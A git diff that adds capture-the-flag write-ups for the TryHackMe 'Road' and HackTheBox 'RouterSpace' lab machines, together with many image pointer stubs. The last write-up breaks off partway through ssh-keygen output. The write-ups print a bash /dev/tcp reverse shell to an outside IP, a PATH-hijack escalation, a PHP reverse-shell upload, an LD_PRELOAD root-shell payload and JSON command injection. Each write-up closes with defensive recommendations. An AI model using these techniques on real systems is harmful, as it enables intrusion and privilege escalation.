+/bin/bash -i >& /dev/tcp/10.10.14.17/1234 0>&1
+```
+I then add the execution rights, and I add `/tmp` in the PATH variable. I then execute the script with sudo.
+
+
+```bash
+chmod +x /tmp/gzip
+export PATH="/tmp:$PATH"
+sudo /opt/scripts/access_backup.sh
+```
+![](img/image-14.webp)
+
+I now have a root shell and can retrieve the last flag.
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not use shell commands in pages accessible by everyone
+- Parse form inputs correctly to avoid injection
+- Do not leave credentials in public backups
+- Use absolute path in scripts using external programs to avoid PATH manipulations
diff --git a/content/writeup-ctf/writeup-road-thm/featured.png b/content/writeup-ctf/writeup-road-thm/featured.png
new file mode 100644
index 0000000..7a73654
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:86ce8520295c56dd55724741e9c39682af756a81637204b985f8130ca12fed28
+size 645512
diff --git a/content/writeup-ctf/writeup-road-thm/featured.webp b/content/writeup-ctf/writeup-road-thm/featured.webp
new file mode 100644
index 0000000..545d1c1
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b3d690faf8ea41dd767ad8150283b8f3a93dd2c6bb2677d4914bffc06cb86ff9
+size 702586
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-1.png b/content/writeup-ctf/writeup-road-thm/img/image-1.png
new file mode 100644
index 0000000..d81169b
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e79f559f6b7a53dee5b1044b5307af9d355365db4012fbd8ca2e946d5019db14
+size 35044
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-1.webp b/content/writeup-ctf/writeup-road-thm/img/image-1.webp
new file mode 100644
index 0000000..83d0819
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:769370f95c5086abfce459d84c3b648574b29f08afbfd3be08e1bec9cf5ee5ad
+size 31926
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-10.png b/content/writeup-ctf/writeup-road-thm/img/image-10.png
new file mode 100644
index 0000000..a55a9fd
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:71d801190b95d19988e671eb3eac39ca28b286d820f051e7f6a27e390186dcef
+size 9403
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-10.webp b/content/writeup-ctf/writeup-road-thm/img/image-10.webp
new file mode 100644
index 0000000..6954d07
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5fe450d3c8a9ac426916119f91bba98294bdbdbbbf3563ab3310a8254e2e2cb9
+size 6742
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-11.png b/content/writeup-ctf/writeup-road-thm/img/image-11.png
new file mode 100644
index 0000000..e01c65a
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9b61fdf4b7ce2171d1cdbd6121cbe40ea94c1d3f90161a746e20f679770aba97
+size 29002
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-11.webp b/content/writeup-ctf/writeup-road-thm/img/image-11.webp
new file mode 100644
index 0000000..ec6cb70
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:cc7ff49a84dbdfa4c8a1d1fc04c5d6ec8299965e33fabb867fb134a812a7a394
+size 27566
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-12.png b/content/writeup-ctf/writeup-road-thm/img/image-12.png
new file mode 100644
index 0000000..009a4ef
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-12.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5e94995c2162500fe3ed70c35e7f27e62beca2fcdf2f888dc0d4cfaf8ae44ee4
+size 83653
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-12.webp b/content/writeup-ctf/writeup-road-thm/img/image-12.webp
new file mode 100644
index 0000000..753e823
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-12.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f5a289fbf74435eff97d12c8a393016d22cc066c7391ae294f5ba325deb3a715
+size 91814
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-13.png b/content/writeup-ctf/writeup-road-thm/img/image-13.png
new file mode 100644
index 0000000..0d8ecce
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-13.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:fbbdedda7dfea4245580daade192eade96839189be45d9ad2e62cff555720fc8
+size 3532
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-13.webp b/content/writeup-ctf/writeup-road-thm/img/image-13.webp
new file mode 100644
index 0000000..3d871b7
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-13.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3d723461c60b63bccd696290de918ba4122f6726d96384fe18e203270c7f6ac5
+size 4754
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-14.png b/content/writeup-ctf/writeup-road-thm/img/image-14.png
new file mode 100644
index 0000000..6a0837d
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-14.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3bb43c0d39dbb3f88664af3dc6ef192bac7c4a7c493285aef1e949629c362e42
+size 33252
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-14.webp b/content/writeup-ctf/writeup-road-thm/img/image-14.webp
new file mode 100644
index 0000000..fe1dff9
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-14.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:65691d526aaf7d5e7606cc3cfea646265db9fc5d6c7faa3349bc71c356cc933e
+size 30066
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-15.png b/content/writeup-ctf/writeup-road-thm/img/image-15.png
new file mode 100644
index 0000000..0c90137
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-15.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b0ef517b7d4bccf433ef5be1b27ef166ac477f6c5cbd6a9dc52a5511b9fcd8b7
+size 18332
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-15.webp b/content/writeup-ctf/writeup-road-thm/img/image-15.webp
new file mode 100644
index 0000000..9e521e0
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-15.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f93077b9ed1d1a671fe86a5f134fe36fbd84b6b18eaecbf9029e53c6c1d17990
+size 21202
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-16.png b/content/writeup-ctf/writeup-road-thm/img/image-16.png
new file mode 100644
index 0000000..0c55dde
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-16.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c188d2fe85b6c1f5f78cdb322231f8dde0615cc3e7753643d829f8534ece2cf6
+size 12383
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-16.webp b/content/writeup-ctf/writeup-road-thm/img/image-16.webp
new file mode 100644
index 0000000..4369119
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-16.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c7e5c29785dca861e2ae23af8a3634340a573747ac1164b633dcb4df2e5ecfba
+size 13372
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-2.png b/content/writeup-ctf/writeup-road-thm/img/image-2.png
new file mode 100644
index 0000000..1bed912
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:965aaff72cd6aa7775228b92afe9f1d6b1d684ff233223bb599e62274a636931
+size 1179085
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-2.webp b/content/writeup-ctf/writeup-road-thm/img/image-2.webp
new file mode 100644
index 0000000..f8103af
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d423cefafba2d002641aaa7975fcf93e3a562746636d0e94d0c71f46e798fa12
+size 132978
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-3.png b/content/writeup-ctf/writeup-road-thm/img/image-3.png
new file mode 100644
index 0000000..0ec3f00
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e4968038694a5e4213e300c9100d1b54fc1c53f76426b4a6229bfd1ba5c9a884
+size 64618
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-3.webp b/content/writeup-ctf/writeup-road-thm/img/image-3.webp
new file mode 100644
index 0000000..f1f10f0
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:daab3797cb6193d0fc1407e8a69c33b67e90e606f8023c4daddd2146a001bdc8
+size 53432
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-4.png b/content/writeup-ctf/writeup-road-thm/img/image-4.png
new file mode 100644
index 0000000..31fe579
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b0fee7577c6dc19e119c5fe68bf90297b03bf52169ed9c3abcffbf611b09cae9
+size 25270
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-4.webp b/content/writeup-ctf/writeup-road-thm/img/image-4.webp
new file mode 100644
index 0000000..0f403fb
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:99a84dab7339cb7b3d93b62ec10ce2264a3e21e49d16d1b257cbbae4f59a3309
+size 6814
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-5.png b/content/writeup-ctf/writeup-road-thm/img/image-5.png
new file mode 100644
index 0000000..3c0cc63
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e04c590d21ad7896b36e01d1c0e71c44b9947c26800d574ae41f5dbd2b45b0fc
+size 62289
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-5.webp b/content/writeup-ctf/writeup-road-thm/img/image-5.webp
new file mode 100644
index 0000000..45c217c
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b764904f9e37f078c5d1e60ca150830fa5c9b80dd8cf52420474aa3e35d8a01a
+size 30022
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-6.png b/content/writeup-ctf/writeup-road-thm/img/image-6.png
new file mode 100644
index 0000000..52e92e1
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f6feb257fa4ece9eb078560332eb5769975aae5dac06ed0ba012a05ec9502d34
+size 10381
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-6.webp b/content/writeup-ctf/writeup-road-thm/img/image-6.webp
new file mode 100644
index 0000000..1e95b7c
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:63628b790496e553fd617987f74765f870afbbbb1836619653e435e663337747
+size 5752
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-7.png b/content/writeup-ctf/writeup-road-thm/img/image-7.png
new file mode 100644
index 0000000..d6080a4
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:de0bde92acb3398f1e1de9fa3f045f49e2b3580ac27e76f2d7968d932d7e060c
+size 9186
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-7.webp b/content/writeup-ctf/writeup-road-thm/img/image-7.webp
new file mode 100644
index 0000000..ea2610a
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6ca9693589d1cbbb54fa4fc4612977611d5511954e8933f4702bc3e5bfc5b166
+size 4558
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-8.png b/content/writeup-ctf/writeup-road-thm/img/image-8.png
new file mode 100644
index 0000000..33d0f3d
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c6dd1edddda21f4b5a4587df30ee9be172dabafce590b5519bc8b6b2d1b99210
+size 103517
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-8.webp b/content/writeup-ctf/writeup-road-thm/img/image-8.webp
new file mode 100644
index 0000000..8e235bc
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4150697566fb5b165cf606ca5b792a82b84a9369e5247958962689ed3a53903b
+size 95612
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-9.png b/content/writeup-ctf/writeup-road-thm/img/image-9.png
new file mode 100644
index 0000000..5b43a4c
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9867ef55f9c6ac150b04bc4b1ec5e9291b9fff8d734b3f99edc0be2d9d318248
+size 14934
diff --git a/content/writeup-ctf/writeup-road-thm/img/image-9.webp b/content/writeup-ctf/writeup-road-thm/img/image-9.webp
new file mode 100644
index 0000000..ed1d2ab
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c2101accbe72e0d962e84c45f82159086ade0b94a97374bde0f93dea00e6135a
+size 5650
diff --git a/content/writeup-ctf/writeup-road-thm/index.md b/content/writeup-ctf/writeup-road-thm/index.md
new file mode 100644
index 0000000..8a9660c
--- /dev/null
+++ b/content/writeup-ctf/writeup-road-thm/index.md
@@ -0,0 +1,155 @@
+---
+title: "Writeup - Road (THM)"
+date: 2022-04-08
+slug: "writeup-road-thm"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Road](https://tryhackme.com/room/road) machine from the TryHackMe site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.57.115
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 8.2p1)
+- 80/tcp : HTTP web server (Apache 2.4.41)
+
+![](img/image-2.webp)
+
+## Exploit
+
+I start with an enumeration of the files of the website.
+
+![](img/image-3.webp)
+
+I find a button on the basic site page that redirects to a login page. We have the possibility to create an account, I start by doing that.
+
+![](img/image-4.webp)
+
+Once the account is created, I log in and see the following page:
+
+![](img/image-5.webp)
+
+In the `edit profil` section you can't modify anything except the profile picture, but after looking closer, a message indicates that only the admins can do this action... Except that we learn an important information: the email of the admin!
+
+![](img/image-6.webp)
+
+After some research on the site, I find another page. This page allows you to change your password. I make a password change and capture the request sent to the server with Burp.
+
+![](img/image-7.webp)
+
+I realize that the email of the account is sent during the validation of the form, so I try to send the request but changing my email for the admin one. The server does not return any error, so I can connect to the admin account of the site!
+
+![](img/image-8.webp)
+
+Now that I'm admin, I can upload a new profile picture!
+
+![](img/image-9.webp)
+
+So I create a PHP reverse shell with the following template:
+
+[php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shellContribute to pentestmonkey/php-reverse-shell development by creating an account on GitHub.![](https://github.com/fluidicon.png)
+
+{{< github repo="pentestmonkey/php-reverse-shell" >}}
+
+I upload my `reverse.php` file thanks to the profile image change form. No error during the upload, I just have to find where the file has been put on the server..
+
+I look at the source code of the page to see if there would not be any information. I find the following comment:
+
+![](img/image-10.webp)
+
+So I go to the following address:
+
+
+```bash
+10.10.57.115/v2/profileimages/reverse.php
+```
+![](img/image-11.webp)
+
+I now have a reverse shell and can recover the first flag.
+
+
+```bash
+$ cat /home/webdeveloper/user.txt
+63191e4ece37523c9fe6bb62a5e64d45
+```
+## Privilege escalation
+
+I start by running [linPeas](https://linpeas.sh). In the result of the command I find that Mysql and MangoDB are running on the machine...
+
+I upgrade my shell with the following command:
+
+
+```bash
+python3 -c 'import pty; pty.spawn("/bin/bash")'
+```
+Then I try to connect to MySQL without success, so I test with MongoDB :
+
+![](img/image-12.webp)
+
+I am now in Mongo, I list the databases with the following command:
+
+![](img/image-13.webp)
+
+After a little exploration, I find in the `backup` database a table `user` :
+
+![](img/image-14.webp)
+
+I can now connect via SSH to webdeveloper. I then check if this user has SUDO authorization:
+
+![](img/image-15.webp)
+
+The `webdeveloper` user can execute the `sky_backup_utility` with root rights. But the most interesting thing is the tag: `env_keep+=LD_PRELOAD`.
+
+After some research I found this website:
+
+[Sudo (LD_PRELOAD) (Linux Privilege Escalation) – Touhid’s Blog](https://touhidshaikh.com/blog/2018/04/sudo-ld_preload-linux-privilege-escalation/)
+
+Overall, it explains that it is possible to execute code before the program and that with root execution rights. So I create a bash.c file with the following content :
+
+
+```C
+#include <stdio.h>
+#include <sys/types.h>
+#include <stdlib.h>
+
+void _init() {
+unsetenv("LD_PRELOAD");
+setgid(0);
+setuid(0);
+system("/bin/bash");
+}
+```
+bash.cThen I compile it with the following command:
+
+
+```bash
+gcc -fPIC -shared -o evil.so evil.c -nostartfiles
+```
+I can now run the program with sudo, without forgetting our code that will be executed at the beginning:
+
+
+```bash
+sudo LD_PRELOAD=/home/webdeveloper/bash.so sky_backup_utility
+```
+![](img/image-16.webp)
+
+I now have a root shell so I can get the last flag.
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Secured the password change page to prevent a user from changing the password of a user other than his own
+- Set up a verification of the upload files to the server to avoid sending PHP code or other
+- Do not store passwords in clear text in a database
+- Secure access to databases
+- Do not change SETUID bit of a program to avoid `LD_PRELOAD` exploit
diff --git a/content/writeup-ctf/writeup-routerspace-htb/featured.png b/content/writeup-ctf/writeup-routerspace-htb/featured.png
new file mode 100644
index 0000000..1ff5c95
--- /dev/null
+++ b/content/writeup-ctf/writeup-routerspace-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:14c2606653260d2f723ec828c283aeb98a6d834e218ee3815372e24352557785
+size 298015
diff --git a/content/writeup-ctf/writeup-routerspace-htb/featured.webp b/content/writeup-ctf/writeup-routerspace-htb/featured.webp
new file mode 100644
index 0000000..a0d4e3d
--- /dev/null
+++ b/content/writeup-ctf/writeup-routerspace-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1ee69a0fd7b5eda7736af887f92317795e8df5aaa52bdf8bd6514620b27a4ba8
+size 27324
diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-1.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-1.png
new file mode 100644
index 0000000..a2d0261
--- /dev/null
+++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9128f3872a7b214ec4082218a5249a3f2875741e4e46a64f17cdf599bb0d7d2a
+size 32095
diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-1.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-1.webp
new file mode 100644
index 0000000..ac2310f
--- /dev/null
+++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e2ed89955d69df3de816797e2d1c5ac44b7844491a93a0ac9dd3039510fc4fc0
+size 24134
diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-2.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-2.png
new file mode 100644
index 0000000..74d26df
--- /dev/null
+++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:232f3e3c57ae61b1109ddc16c66692b3e1fb395b509561753a78ae0f42b47fb0
+size 351037
diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-2.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-2.webp
new file mode 100644
index 0000000..7002299
--- /dev/null
+++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:306456dbeb2880ee49114b28b0d98e9f5d1a6225ff10d47de454322ed1e038fa
+size 64370
diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-3.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-3.png
new file mode 100644
index 0000000..203ee62
--- /dev/null
+++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b321b993518d3c4d2eaf1ec1719c1ac235078580156aba3330b54cfb48f18725
+size 40450
diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-3.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-3.webp
new file mode 100644
index 0000000..eba97c5
--- /dev/null
+++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bc032b528eb4c0d34a25ef1e9cf2747bde4a1beb1dad3d6b27d6f153ad6168ef
+size 33076
diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-4.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-4.png
new file mode 100644
index 0000000..f837e14
--- /dev/null
+++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:95386c180e625875e2b7858714242cfb8d2f0d238355cd3360e74dbbc6c47871
+size 35670
diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-4.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-4.webp
new file mode 100644
index 0000000..9e774ca
--- /dev/null
+++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:42a0f23e173b1b214cbf82fabe10982516630a88c995bc4cc9b2678f38ee1766
+size 33494
diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-5.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-5.png
new file mode 100644
index 0000000..bcf1636
--- /dev/null
+++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:cad33c99df2766d2ced1bd231e3da74c73b9efb7a3f1ad56033fe89c9054f685
+size 37242
diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-5.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-5.webp
new file mode 100644
index 0000000..69e9cfd
--- /dev/null
+++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5313aa7d3a9bc6a7bad664fb72258ed1f84b872927934e8fc2be32f3d9237d86
+size 35452
diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-6.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-6.png
new file mode 100644
index 0000000..d953858
--- /dev/null
+++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a95773c58f7306db639038041c8d6cdf1d01fb4e81488a6bc4df9f7db59e74d5
+size 80746
diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-6.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-6.webp
new file mode 100644
index 0000000..9acce79
--- /dev/null
+++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:cd35511688859c2f6b446299c961285f5d510ab2b4b360b88a6ca9db813796f0
+size 53744
diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-7.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-7.png
new file mode 100644
index 0000000..9127602
--- /dev/null
+++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:03f01d7cea42fa374ef0f666d02fdff7abde117990b115f5545a4e97e77d361e
+size 31588
diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-7.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-7.webp
new file mode 100644
index 0000000..b26ce74
--- /dev/null
+++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:af98b4d43dfe66f4296ae1341feb43d30871df57f247af4fe81304c75e5b1f1a
+size 27352
diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-8.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-8.png
new file mode 100644
index 0000000..b21c096
--- /dev/null
+++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1d5435e4c0f8263aa98c9b97701fe719530f626fc2d612f9fd6a5ed6f36c1001
+size 14402
diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-8.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-8.webp
new file mode 100644
index 0000000..8916350
--- /dev/null
+++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:fe6b9937a10d7a9e994ab5852a1b76c902434fb761212be0d5cad2710e8d16ba
+size 13938
diff --git a/content/writeup-ctf/writeup-routerspace-htb/index.md b/content/writeup-ctf/writeup-routerspace-htb/index.md
new file mode 100644
index 0000000..c8ac46f
--- /dev/null
+++ b/content/writeup-ctf/writeup-routerspace-htb/index.md
@@ -0,0 +1,134 @@
+---
+title: "Writeup - RouterSpace (HTB)"
+date: 2022-04-05
+slug: "writeup-routerspace-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [RouterSpace](https://app.hackthebox.com/machines/RouterSpace) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV 10.129.175.15
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port
+- 80/tcp : HTTP web server
+
+Let's go to the site and see if we can find some information.
+
+![](img/image-2.webp)
+
+The site presents us with an application to connect our router to "routerspace". In addition to this information we have the possibility to download the application in .apk format.
+
+## Exploit
+
+I first tried to analyze the application with [APKtool](https://www.kali.org/tools/apktool/). But I didn't find anything special. So I will try to install it with the help of an emulator.
+
+After testing several emulation solutions, I finally chose Anbox. To install it on kali I followed the following guide:
+
+[How to install Anbox on Debian](https://dev.to/sbellone/how-to-install-anbox-on-debian-1hjd)
+
+After starting Anbox, I start Burp in listening mode on all interfaces, then I set adb with the burp proxy with the following command:
+
+
+```bash
+adb shell settings put global http_proxy 192.168.250.1:8080
+```
+I then install the application with the following command:
+
+
+```bash
+adb install RouterSpace.apk
+```
+After starting the application and testing the connection, I notice that burp is intercepting packets to "<http://routerspace.htb>". So I add this domain to the "/etc/hosts" file.
+
+![](img/image-3.webp)
+
+While analyzing the packet sent by the application I notice a json IP field.
+
+![](img/image-4.webp)
+
+By adding ";" I can insert a command that the remote host interprets as a command. Perfect!
+
+After some tests I realize that I can't launch a reverse shell, possibly there are firewall rules that block. To be confirmed...
+
+Another solution is to use SSH to get access. I check if there is a '.ssh' folder for the user paul :
+
+![](img/image-5.webp)
+
+It exists, so I generate keys:
+
+
+```bash
+┌──(kali㉿kali)-[~]
+└─$ ssh-keygen 
+Generating public/private rsa key pair.
+Enter file in which to save the key (/home/kali/.ssh/id_rsa): 
+Enter passphrase (empty for no passphrase): 
+Enter same passphrase again: 
+Your identification has been saved in /home/kali/.ssh/id_rsa
+Your public key has been saved in /home/kali/.ssh/id_rsa.pub
+The key fingerprint is:
+SHA256:UbAb/Eaflsqf/Wneee+yy26b+ZymMNXYfXH7oxac8/E kali@kali
+The key's randomart image is:
++---[RSA 3072]----+
+|        ...      |
+|       . o       |
+|        = .    ..|
+|         * . o+ =|
+|        S o *o.+o|
